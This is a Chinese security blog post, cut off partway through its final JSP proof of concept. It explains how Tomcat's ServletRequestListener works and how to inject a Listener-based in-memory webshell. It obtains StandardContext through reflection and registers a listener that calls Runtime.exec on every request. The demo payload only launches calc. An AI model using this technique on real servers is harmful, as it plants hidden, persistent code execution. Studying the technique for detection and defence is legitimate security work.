<!doctype html>
<html lang="zh-CN">
<head>
  <meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="color-scheme" content="light dark">
<meta name="theme-color" content="#f7f7f4" data-theme-color-light="#f7f7f4" data-theme-color-dark="#161614">

<title>Listener内存马 — CurlySean&#39;s Blog</title>
<meta name="description" content="这里是 CurlySean 的个人技术博客，记录漏洞研究、代码审计与攻防实践，整理可以复现、验证与继续推演的技术细节。">
<link rel="canonical" href="https://curlysean.github.io/2025/03/25/Listener%E5%86%85%E5%AD%98%E9%A9%AC/">
<link rel="preload" href="/fonts/instrument-sans-latin-wght-normal.woff2" as="font" type="font/woff2" crossorigin>
<link rel="preload" href="/fonts/jetbrains-mono-latin-wght-normal.woff2" as="font" type="font/woff2" crossorigin>
<link rel="stylesheet" href="/css/style.css">
<script>
  (function () {
    try {
      var key = 'sheepfold-theme';
      var saved = localStorage.getItem(key);
      var dark = saved === 'dark' || (saved !== 'light' && window.matchMedia('(prefers-color-scheme: dark)').matches);
      document.documentElement.setAttribute('data-theme', dark ? 'dark' : 'light');
      document.documentElement.classList.add('js');
    } catch (error) {
      document.documentElement.classList.add('js');
    }
  })();
</script>

<meta name="generator" content="Hexo 7.3.0"></head>
<body class="page-type-post">
  <a class="skip-link" href="#main-content">跳至正文</a>
  
<header class="site-header" data-header>
  <div class="site-header__inner frame">
    <a class="brand" href="/" aria-label="CurlySean&#39;s Blog 首页">
      <span class="brand__name">CURLYSEAN</span>
      <span class="brand__suffix">SECURITY NOTES</span>
    </a>
    <nav class="desktop-nav" aria-label="主导航">
      
        <a class="desktop-nav__link" href="/">首页</a>
      
        <a class="desktop-nav__link" href="/archives/">文章</a>
      
        <a class="desktop-nav__link" href="/categories/">分类</a>
      
        <a class="desktop-nav__link" href="/tags/">标签</a>
      
        <a class="desktop-nav__link" href="/friends/">友链</a>
      
        <a class="desktop-nav__link" href="/about/">关于</a>
      
    </nav>
    <div class="site-header__actions">
      <button class="theme-toggle" type="button" data-theme-toggle aria-label="切换颜色模式" title="切换颜色模式">
        <span data-theme-toggle-label>暗色</span>
      </button>
      
        <a class="header-cta header-cta--ghost" href="/archives/">全部文章 <span aria-hidden="true">↗</span></a>
      
      <button class="menu-toggle" type="button" aria-expanded="false" aria-controls="mobile-menu" data-menu-toggle>
        <span class="sr-only">打开导航</span>
        <span></span><span></span>
      </button>
    </div>
  </div>
  <nav class="mobile-nav" id="mobile-menu" aria-label="移动端主导航" data-mobile-menu>
    <div class="frame mobile-nav__inner">
      
        <a class="mobile-nav__link" href="/">
          <span>01</span>首页<i aria-hidden="true">↗</i>
        </a>
      
        <a class="mobile-nav__link" href="/archives/">
          <span>02</span>文章<i aria-hidden="true">↗</i>
        </a>
      
        <a class="mobile-nav__link" href="/categories/">
          <span>03</span>分类<i aria-hidden="true">↗</i>
        </a>
      
        <a class="mobile-nav__link" href="/tags/">
          <span>04</span>标签<i aria-hidden="true">↗</i>
        </a>
      
        <a class="mobile-nav__link" href="/friends/">
          <span>05</span>友链<i aria-hidden="true">↗</i>
        </a>
      
        <a class="mobile-nav__link" href="/about/">
          <span>06</span>关于<i aria-hidden="true">↗</i>
        </a>
      
    </div>
  </nav>
</header>

  <main id="main-content">
    
<article class="post-page">
  <header class="post-hero">
    <div class="frame post-hero__grid reveal">
      <div class="post-hero__label">
        <p class="eyebrow">FIELD NOTE / 2025</p>
        
          <a href="/categories/Java/">Java ↗</a>
        
      </div>
      <div class="post-hero__main">
        <h1>Listener内存马</h1>
        
      </div>
    </div>
  </header>

  <div class="frame post-content-layout">
    <aside class="post-rail">
      <div class="post-rail__inner">
        <p class="eyebrow">ON THIS PAGE</p>
        
          <nav class="toc" aria-label="文章目录"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#drSHJ"><span class="toc-text">前置基础</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#CR1KX"><span class="toc-text">构建listener</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#chM1X"><span class="toc-text">分析</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#G3Dyy"><span class="toc-text">访问前</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#rIKmD"><span class="toc-text">访问后</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#GXNsR"><span class="toc-text">实现</span></a></li></ol></nav>
        
      </div>
    </aside>
    <div class="article-column">
      <div class="post-meta-grid reveal">
        <div><span>发布</span><time datetime="2025-03-25T03:12:32.000Z">2025.03.25</time></div>
        <div><span>更新</span><time datetime="2025-03-25T03:12:32.000Z">2025.03.25</time></div>
        <div><span>阅读</span><strong>约 4 分钟</strong></div>
        <div><span>标签</span><strong>1</strong></div>
      </div>
      <div class="article-body">
        
<h2 id="drSHJ">前置基础</h2>

<p><font style="color:rgb(80, 80, 92);">Java Web 开发中的监听器（Listener）就是 Application、Session 和 Request 三大对象创建、销毁或者往其中添加、修改、删除属性时自动执行代码的功能组件。</font></p>
<p><strong><font style="color:rgb(80, 80, 92);">Listener三个域对象</font></strong></p>
<ul>
<li>ServletContextListener</li>
<li>HttpSessionListener</li>
<li>ServletRequestListener</li>
</ul>
<p><font style="color:rgb(80, 80, 92);">根据名字来看，ServletRequestListenner是最适合当作内存马的。从名字就知道，ServletRequestListener是用来监听ServletRequest对象的，当我们访问任意资源时，即可触发</font><code>ServletRequestListener#requestInitialized()</code><font style="color:rgb(83, 83, 96);background-color:rgb(242, 242, 242);">方法</font></p>
<h3 id="CR1KX">构建listener</h3>
之前构建Filter内存马，需要定义一个实现好filter接口的类，Listener也是一样，需要定义一个实现好Listener接口的类

<p>要实现listener的业务，就要实现<code>EventListener</code>，感觉和<code>Serializable</code>接口相似，只起了一个标记作用</p>
<figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">package java.<span class="property">util</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * A tagging interface that all event listener interfaces must extend.</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@since</span> JDK1.1</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line">public interface <span class="title class_">EventListener</span> &#123;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><code>EventListener</code>的实现类非常多，我们优先找Servlet开头的，方便去触发我们所构造的恶意Lisenter</p>
<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1740051632668-b59d7e1d-f50c-4baf-abd5-0bad4306cd3a.png" alt="Listener内存马" loading="lazy"></p>
<p>我们找到了<code>ServletRequestListener</code></p>
<p>感觉该监听器在我们每次发送请求时，都会触发其<code>requestInitialized</code>方法</p>
<figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">public interface <span class="title class_">ServletRequestListener</span> <span class="keyword">extends</span> <span class="title class_">EventListener</span> &#123;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">default</span> public <span class="keyword">void</span> <span class="title function_">requestDestroyed</span>(<span class="params">ServletRequestEvent sre</span>) &#123;&#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">default</span> public <span class="keyword">void</span> <span class="title function_">requestInitialized</span>(<span class="params">ServletRequestEvent sre</span>) &#123;&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>先构造一个简单的listener</p>
<p><font style="color:rgb(80, 80, 92);">因为前面猜想 </font><code>requestInitialized()</code><font style="color:rgb(80, 80, 92);"> 方法可以触发 Listener 监控器，所以我们在 </font><code>requestInitialized()</code><font style="color:rgb(80, 80, 92);"> 方法里面加上一些代码，来证明它何时被执行。</font></p>
<figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> javax.<span class="property">servlet</span>.<span class="property">ServletRequestEvent</span>;</span><br><span class="line"><span class="keyword">import</span> javax.<span class="property">servlet</span>.<span class="property">ServletRequestListener</span>;</span><br><span class="line"><span class="keyword">import</span> javax.<span class="property">servlet</span>.<span class="property">annotation</span>.<span class="property">WebListener</span>;</span><br><span class="line"></span><br><span class="line">@<span class="title class_">WebListener</span>(<span class="string">&quot;/listenerTest&quot;</span>)</span><br><span class="line">public <span class="keyword">class</span> <span class="title class_">ListenerTest</span> implements <span class="title class_">ServletRequestListener</span> &#123;</span><br><span class="line"></span><br><span class="line">    public <span class="title class_">ListenerTest</span>()&#123;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    @<span class="title class_">Override</span></span><br><span class="line">    public <span class="keyword">void</span> <span class="title function_">requestDestroyed</span>(<span class="params">ServletRequestEvent sre</span>) &#123;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    @<span class="title class_">Override</span></span><br><span class="line">    public <span class="keyword">void</span> <span class="title function_">requestInitialized</span>(<span class="params">ServletRequestEvent sre</span>) &#123;</span><br><span class="line">        <span class="title class_">System</span>.<span class="property">out</span>.<span class="title function_">println</span>(<span class="string">&quot;Listener Initialized&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>同样我们也需要在web.xml中配置</p>
<figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;listener&gt;</span><br><span class="line">    <span class="language-xml"><span class="tag">&lt;<span class="name">listener-class</span>&gt;</span>ListenerTest<span class="tag">&lt;/<span class="name">listener-class</span>&gt;</span></span></span><br><span class="line">&lt;/listener&gt;</span><br></pre></td></tr></table></figure>

<p>接下来在访问路径时，都会打印信息</p>
<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1740052668225-37ead02c-f9ad-414a-b125-49cd8446d991.png" alt="Listener内存马" loading="lazy"></p>
<p><font style="color:rgb(80, 80, 92);">至此，Listener 基础代码实现完成，下面我们来分析 Listener 的运行流程。</font></p>
<h2 id="chM1X"><font style="color:rgb(80, 80, 92);">分析</font></h2>
<h3 id="G3Dyy">访问前</h3>

<p>与servlet注册时相似，我们直接看到解析xml文件后做注册的地方<code>ContextConfig#configureContext</code></p>
<p>将web.xml读取后，作为参数传入该方法中后，对servlet、filter、listener等组件进行配置</p>
<p>调试<code>ContextConfig#configureContext</code>，我们可以看到，获取的web.xml中已经有了对应的Listener文件</p>
<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1740053961879-7b95aad3-3465-4485-8eb6-084f293f0839.png" alt="Listener内存马" loading="lazy"></p>
<p>我们在这里重点关注listener的读取</p>
<figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">private <span class="keyword">void</span> <span class="title function_">configureContext</span>(<span class="params">WebXml webxml</span>) &#123;</span><br><span class="line">        ......</span><br><span class="line">        <span class="keyword">for</span> (<span class="title class_">String</span> listener : webxml.<span class="title function_">getListeners</span>()) &#123;</span><br><span class="line">            context.<span class="title function_">addApplicationListener</span>(listener);</span><br><span class="line">        &#125;</span><br><span class="line">        ......</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>我们在此处下个断点，运行到这里</p>
<p>这里的context是<code>StandardContext</code>，执行的是<code>StandardContext</code>的<code>addApplicationListener</code>方法</p>
<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1740053700525-8b867fe1-c4d0-4aca-b895-92052e1a64aa.png" alt="Listener内存马" loading="lazy"></p>
<p><strong>在读取完web.xml文件后，需要去加载Listener</strong></p>
<p><font style="color:rgb(80, 80, 92);">当我们读取完配置文件，当应用启动的时候，</font><code>StandardContext</code><font style="color:rgb(80, 80, 92);"> 会去调用 </font><code>listenerStart()</code><font style="color:rgb(80, 80, 92);"> 方法。这个方法做了一些基础的安全检查，最后完成简单的 start 业务。</font></p>
<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1740054961265-c2caae24-9a9c-4af6-88e5-201e596da917.png" alt="Listener内存马" loading="lazy"></p>
<p><font style="color:rgb(80, 80, 92);">刚开始的地方，</font><code>listenerStart()</code><font style="color:rgb(80, 80, 92);"> 方法中有这么一个语句</font></p>
<figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="title class_">String</span> listeners[] = <span class="title function_">findApplicationListeners</span>();</span><br></pre></td></tr></table></figure>

<p><font style="color:rgb(80, 80, 92);">这里这个方法实际就是把之前的 Listener 返回，存放到listeners</font></p>
<figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">@<span class="title class_">Override</span></span><br><span class="line">    public <span class="title class_">String</span>[] <span class="title function_">findApplicationListeners</span>(<span class="params"></span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> applicationListeners;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<h3 id="rIKmD">访问后</h3>

<p>把断点下在<code>requestInitialized</code>方法，开启调试，访问路径后走到这里</p>
<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1740055305524-71187a36-c398-4d73-a0ae-23cdbcf0fbff.png" alt="Listener内存马" loading="lazy"></p>
<p>但这里只是我们所写的代码执行点，我们需要向上找，找到<code>StandardContext#fireRequestInitEvent</code>方法</p>
<p>这里会调用<code>getApplicationEventListeners</code>方法，获取<code>ApplicationEventListeners</code>并存入<code>instances[]</code>中</p>
<figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">@<span class="title class_">Override</span></span><br><span class="line">   public boolean <span class="title function_">fireRequestInitEvent</span>(<span class="params">ServletRequest request</span>) &#123;</span><br><span class="line"></span><br><span class="line">       <span class="title class_">Object</span> instances[] = <span class="title function_">getApplicationEventListeners</span>();</span><br><span class="line"></span><br><span class="line">       <span class="keyword">if</span> ((instances != <span class="literal">null</span>) &amp;&amp; (instances.<span class="property">length</span> &gt; <span class="number">0</span>)) &#123;</span><br><span class="line"></span><br><span class="line">           <span class="title class_">ServletRequestEvent</span> event =</span><br><span class="line">                   <span class="keyword">new</span> <span class="title class_">ServletRequestEvent</span>(<span class="title function_">getServletContext</span>(), request);</span><br><span class="line"></span><br><span class="line">           <span class="keyword">for</span> (<span class="title class_">Object</span> instance : instances) &#123;</span><br><span class="line">               <span class="keyword">if</span> (instance == <span class="literal">null</span>) &#123;</span><br><span class="line">                   <span class="keyword">continue</span>;</span><br><span class="line">               &#125;</span><br><span class="line">               <span class="keyword">if</span> (!(instance <span class="keyword">instanceof</span> <span class="title class_">ServletRequestListener</span>)) &#123;</span><br><span class="line">                   <span class="keyword">continue</span>;</span><br><span class="line">               &#125;</span><br><span class="line">               <span class="title class_">ServletRequestListener</span> listener = (<span class="title class_">ServletRequestListener</span>) instance;</span><br><span class="line"></span><br><span class="line">               <span class="keyword">try</span> &#123;</span><br><span class="line">                   listener.<span class="title function_">requestInitialized</span>(event);</span><br><span class="line">               &#125; <span class="keyword">catch</span> (<span class="title class_">Throwable</span> t) &#123;</span><br><span class="line">                   <span class="title class_">ExceptionUtils</span>.<span class="title function_">handleThrowable</span>(t);</span><br><span class="line">                   <span class="title function_">getLogger</span>().<span class="title function_">error</span>(sm.<span class="title function_">getString</span>(</span><br><span class="line">                           <span class="string">&quot;standardContext.requestListener.requestInit&quot;</span>,</span><br><span class="line">                           instance.<span class="title function_">getClass</span>().<span class="title function_">getName</span>()), t);</span><br><span class="line">                   request.<span class="title function_">setAttribute</span>(<span class="title class_">RequestDispatcher</span>.<span class="property">ERROR_EXCEPTION</span>, t);</span><br><span class="line">                   <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">               &#125;</span><br><span class="line">           &#125;</span><br><span class="line">       &#125;</span><br><span class="line">       <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">   &#125;</span><br></pre></td></tr></table></figure>

<p>我们进入到<code>getApplicationEventListeners()</code>方法中，可以看到该方法只做了一件事：<font style="color:rgb(80, 80, 92);">获取一个 Listener 数组</font></p>
<figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">@<span class="title class_">Override</span></span><br><span class="line">    public <span class="title class_">Object</span>[] <span class="title function_">getApplicationEventListeners</span>(<span class="params"></span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> applicationEventListenersList.<span class="title function_">toArray</span>();</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>后面的for循环，会从<font style="color:rgb(80, 80, 92);">Listener数组中，将listener一个一个取出来，去执行它的</font><code>&lt;font style=&quot;color:rgb(80, 80, 92);&quot;&gt;requestInitialized&lt;/font&gt;</code><font style="color:rgb(80, 80, 92);">方法</font></p>
<figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">for</span> (<span class="title class_">Object</span> instance : instances) &#123;</span><br><span class="line">                <span class="keyword">if</span> (instance == <span class="literal">null</span>) &#123;</span><br><span class="line">                    <span class="keyword">continue</span>;</span><br><span class="line">                &#125;</span><br><span class="line">                <span class="keyword">if</span> (!(instance <span class="keyword">instanceof</span> <span class="title class_">ServletRequestListener</span>)) &#123;</span><br><span class="line">                    <span class="keyword">continue</span>;</span><br><span class="line">                &#125;</span><br><span class="line">                <span class="title class_">ServletRequestListener</span> listener = (<span class="title class_">ServletRequestListener</span>) instance;</span><br><span class="line"></span><br><span class="line">                <span class="keyword">try</span> &#123;</span><br><span class="line">                    listener.<span class="title function_">requestInitialized</span>(event);</span><br><span class="line">                &#125; <span class="keyword">catch</span> (<span class="title class_">Throwable</span> t) &#123;</span><br><span class="line">                    <span class="title class_">ExceptionUtils</span>.<span class="title function_">handleThrowable</span>(t);</span><br><span class="line">                    <span class="title function_">getLogger</span>().<span class="title function_">error</span>(sm.<span class="title function_">getString</span>(</span><br><span class="line">                            <span class="string">&quot;standardContext.requestListener.requestInit&quot;</span>,</span><br><span class="line">                            instance.<span class="title function_">getClass</span>().<span class="title function_">getName</span>()), t);</span><br><span class="line">                    request.<span class="title function_">setAttribute</span>(<span class="title class_">RequestDispatcher</span>.<span class="property">ERROR_EXCEPTION</span>, t);</span><br><span class="line">                    <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br></pre></td></tr></table></figure>

<p>我们现在就要想，向这个数组中去添加我们的恶意listener</p>
<p><font style="color:rgb(80, 80, 92);">我们可以通过 </font><code>StandardContext#addApplicationEventListener()</code><font style="color:rgb(80, 80, 92);"> 方法来添加 Listener</font></p>
<figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">public <span class="keyword">void</span> <span class="title function_">addApplicationEventListener</span>(<span class="params"><span class="built_in">Object</span> listener</span>) &#123;</span><br><span class="line">        applicationEventListenersList.<span class="title function_">add</span>(listener);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<blockquote>
<p><font style="color:rgb(80, 80, 92);background-color:rgb(247, 247, 247);">到这一步的调试就没有内容了，所以这里的逻辑有应该是和 Filter 差不多的，Listener 这里有一个 Listener 数组，对应的 Filter 里面也有一个 Filter 数组。</font></p>
</blockquote>
<h2 id="GXNsR">实现</h2>
要实现内存马的注入，有以下两步

<ul>
<li>在Listener中的<code>requestInitialized()</code><font style="color:rgb(80, 80, 92);"> 方法里面写入恶意代码</font></li>
<li><font style="color:rgb(80, 80, 92);">通过 StandardContext 类的 </font><code>addApplicationEventListener()</code><font style="color:rgb(80, 80, 92);"> 方法把恶意的 Listener 放进去</font></li>
</ul>
<p><font style="color:rgb(80, 80, 92);">首先和前两个内存马一样，通过反射来获取</font><code>&lt;font style=&quot;color:rgb(80, 80, 92);&quot;&gt;StandardContext&lt;/font&gt;</code></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">ServletContext</span> <span class="variable">servletContext</span> <span class="operator">=</span>  request.getServletContext();  </span><br><span class="line"><span class="type">Field</span> <span class="variable">applicationContextField</span> <span class="operator">=</span> servletContext.getClass().getDeclaredField(<span class="string">&quot;context&quot;</span>);  </span><br><span class="line">applicationContextField.setAccessible(<span class="literal">true</span>);  </span><br><span class="line"><span class="type">ApplicationContext</span> <span class="variable">applicationContext</span> <span class="operator">=</span> (ApplicationContext) applicationContextField.get(servletContext);  </span><br><span class="line">  </span><br><span class="line"><span class="type">Field</span> <span class="variable">standardContextField</span> <span class="operator">=</span> applicationContext.getClass().getDeclaredField(<span class="string">&quot;context&quot;</span>);  </span><br><span class="line">standardContextField.setAccessible(<span class="literal">true</span>);  </span><br><span class="line"><span class="type">StandardContext</span> <span class="variable">standardContext</span> <span class="operator">=</span> (StandardContext) standardContextField.get(applicationContext);  </span><br></pre></td></tr></table></figure>

<p>接下来定义我们的恶意Listener</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&lt;%!</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Shell_Listener</span> <span class="keyword">implements</span> <span class="title class_">ServletRequestListener</span> &#123;</span><br><span class="line"> </span><br><span class="line">        <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">requestInitialized</span><span class="params">(ServletRequestEvent sre)</span> &#123;</span><br><span class="line">            Runtime.getRuntime().exec(<span class="string">&quot;calc&quot;</span>);</span><br><span class="line">        &#125;</span><br><span class="line"> </span><br><span class="line">        <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">requestDestroyed</span><span class="params">(ServletRequestEvent sre)</span> &#123;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">%&gt;</span><br></pre></td></tr></table></figure>

<p>最后就要实例化内存马，并<font style="color:rgb(80, 80, 92);">添加监听器</font></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;%</span><br><span class="line">	<span class="type">Shell_Listener</span> <span class="variable">shell_Listener</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Shell_Listener</span>();</span><br><span class="line">    context.addApplicationEventListener(shell_Listener);</span><br><span class="line">%&gt;</span><br></pre></td></tr></table></figure>

<p>最终poc</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line">&lt;%@ page contentType=<span class="string">&quot;text/html;charset=UTF-8&quot;</span> language=<span class="string">&quot;java&quot;</span> %&gt;</span><br><span class="line">&lt;%@ page <span class="keyword">import</span>=<span class="string">&quot;org.apache.catalina.core.StandardContext&quot;</span> %&gt;</span><br><span class="line">&lt;%@ page <span class="keyword">import</span>=<span class="string">&quot;java.util.List&quot;</span> %&gt;</span><br><span class="line">&lt;%@ page <span class="keyword">import</span>=<span class="string">&quot;java.util.Arrays&quot;</span> %&gt;</span><br><span class="line">&lt;%@ page <span class="keyword">import</span>=<span class="string">&quot;org.apache.catalina.core.ApplicationContext&quot;</span> %&gt;</span><br><span class="line">&lt;%@ page <span class="keyword">import</span>=<span class="string">&quot;java.lang.reflect.Field&quot;</span> %&gt;</span><br><span class="line">&lt;%@ page <span class="keyword">import</span>=<span class="string">&quot;java.util.ArrayList&quot;</span> %&gt;</span><br><span class="line">&lt;%@ page <span class="keyword">import</span>=<span class="string">&quot;java.io.InputStream&quot;</span> %&gt;</span><br><span class="line">&lt;%@ page <span class="keyword">import</span>=<span class="string">&quot;org.apache.catalina.connector.Request&quot;</span> %&gt;</span><br><span class="line">&lt;%@ page <span class="keyword">import</span>=<span class="string">&quot;org.apache.catalina.connector.Response&quot;</span> %&gt;</span><br><span class="line">&lt;%@ page <span class="keyword">import</span>=<span class="string">&quot;java.io.IOException&quot;</span> %&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">    &lt;title&gt;Title&lt;/title&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line"></span><br><span class="line">&lt;%!</span><br><span class="line">  <span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Shell_Listener</span> <span class="keyword">implements</span> <span class="title class_">ServletRequestListener</span> &#123;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">requestInitialized</span><span class="params">(ServletRequestEvent sre)</span> &#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            Runtime.getRuntime().exec(<span class="string">&quot;calc&quot;</span>);</span><br><span class="line">        &#125; <span class="keyword">catch</span> (IOException e) &#123;</span><br><span class="line">            <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">RuntimeException</span>(e);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">requestDestroyed</span><span class="params">(ServletRequestEvent sre)</span> &#123;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">%&gt;</span><br><span class="line"></span><br><span class="line">&lt;%</span><br><span class="line">  <span class="type">ServletContext</span> <span class="variable">servletContext</span> <span class="operator">=</span>  request.getServletContext();</span><br><span class="line">  <span class="type">Field</span> <span class="variable">applicationContextField</span> <span class="operator">=</span> servletContext.getClass().getDeclaredField(<span class="string">&quot;context&quot;</span>);</span><br><span class="line">  applicationContextField.setAccessible(<span class="literal">true</span>);</span><br><span class="line">  <span class="type">ApplicationContext</span> <span class="variable">applicationContext</span> <span class="operator">=</span> (ApplicationContext) applicationContextField.get(servletContext);</span><br><span class="line"></span><br><span class="line">  <span class="type">Field</span> <span class="variable">standardContextField</span> <span class="operator">=</span> applicationContext.getClass().getDeclaredField(<span class="string">&quot;context&quot;</span>);</span><br><span class="line">  